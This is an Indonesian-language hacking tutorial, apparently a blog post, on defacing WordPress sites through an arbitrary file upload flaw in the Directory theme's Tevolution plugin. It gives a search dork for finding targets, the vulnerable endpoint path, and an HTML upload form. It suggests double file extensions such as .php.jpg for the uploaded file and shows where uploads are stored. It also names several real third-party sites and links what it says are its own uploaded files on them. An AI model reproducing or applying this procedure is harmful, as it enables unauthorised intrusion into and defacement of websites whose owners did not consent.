Malem gan :D , kali ini gw akan share salah satu tutorial Deface Wp Themes Directory Arbitrary File Upload Vulnerability :v ,gak usah basa-basi ,Langsung aja Intip tutorial dibawah ini :
Dork : inurl:/wp-content/themes/Directory/
Cari target dulu baru masukin Exploit ini :V
Exploit : Target.com/wp-content/plugins/Tevolution/tmplconnector/monetize/templatic-custom_fields/single-upload.php
CSRF:
<form
action="target.com/wp-content/plugins/Tevolution/tmplconnector/monetize/templatic-custom_fields/single-upload.php"
method="post"
enctype="multipart/form-data">
<label for="file">Filename:</label>
<input type="file" name="Filedata" ><br>
<input type="submit" name="submit" value="3xploi7ed !">
</form>
*Csrf simpan dengan ekstensi .html :D
Kalo Vuln pas di exploit Blank :v
Kalo gak blank / 404 not found iklasin aja :V
Live target aja broo :D :
Nih target gw : http://littleitalycollegest.com/
Tambahin Exploit : http://littleitalycollegest.com/wp-content/plugins/Tevolution/tmplconnector/monetize/templatic-custom_fields/single-upload.php
 |
| Vuln Brooo :D |
"Vuln tandanya BLANK" seperti gambar diatas :D
Lalu masukin target lu ke Csrf di atas ,ganti yang target.com ,sama targetmu :v
nah kalo udah pilih file mu :
Upload Your File : file lu.php.jpg / file lu.php.txt / file lu.txt.
 |
Nah kalo ada angka gitu ,berarti itu tandanya file Lu udah diupload dan Sukses :D
wkwkwkwk
Akses file nya : target.com;/wp-content/themes/Directory/images/tmp/
Hasil Saya :D
http://littleitalycollegest.com/wp-content/themes/Directory/images/tmp/1478610783_x.txt
http://majelis.info/wp-content/themes/Directory/images/tmp/1478355985_x.txt
http://www.hoboken-bar.net/wp-content/themes/Directory/images/tmp/1478412279_x.txt
http://cambodiapages.info/wp-content/themes/Directory/images/tmp/1478412649_x.txt
0 Comments